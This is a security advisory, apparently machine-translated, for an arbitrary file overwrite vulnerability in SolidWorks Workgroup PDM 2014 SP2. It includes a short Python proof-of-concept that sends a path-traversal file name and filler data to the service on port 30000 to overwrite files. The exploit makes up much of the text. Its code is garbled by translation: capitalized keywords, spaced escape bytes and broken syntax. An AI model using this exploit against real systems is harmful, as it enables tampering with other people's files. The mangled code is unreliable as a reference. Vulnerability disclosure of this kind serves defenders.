Release date:
Updated on:
Affected Systems:
SolidWorks Workgroup PDM 2014 SP2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65751
SolidWorks Workgroup PDM software helps individuals and small working groups manage projects and control their design versions.
SolidWorks Workgroup PDM 2014 SP2 and other versions have the Arbitrary File Overwrite Vulnerability. Successful exploitation of the vulnerability allows attackers to overwrite arbitrary files in the context of the affected application users.
<* Source: Mohamed Shetta
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/env python
Import socket
Import struct
Import ctypes
FileName = "\ x2E \ x00 \ x2E \ x00 \ x5C \ x00 \ x2E \ x00 \ x2E \ x00 \ x5C \ x00 \ x74 \ x00 \ x65 \ x00 \ x73 \ x00 \ x74 \ x00 "#.. \.. \ test
Data = "A" x 1028
FileSize = len (Data)
FNsz = len (FileName)
OpCode = "\ xD0 \ x07 \ x00 \ x00"
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect ("192.168.0.4", 30000 ))
S. send (OpCode)
S. send (struct. pack ("I", FNsz ))
S. send (FileName)
S. send (struct. pack ('<Q', FileSize ))
S. send (Data)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SolidWorks
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.solidworks.com.cn/